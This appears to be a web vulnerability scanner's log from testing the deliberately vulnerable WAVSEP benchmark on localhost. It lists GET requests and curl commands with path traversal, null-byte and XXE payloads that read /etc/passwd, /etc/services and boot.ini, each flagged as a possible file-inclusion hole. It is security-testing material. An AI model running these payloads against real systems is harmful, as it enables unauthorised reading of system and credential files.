GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
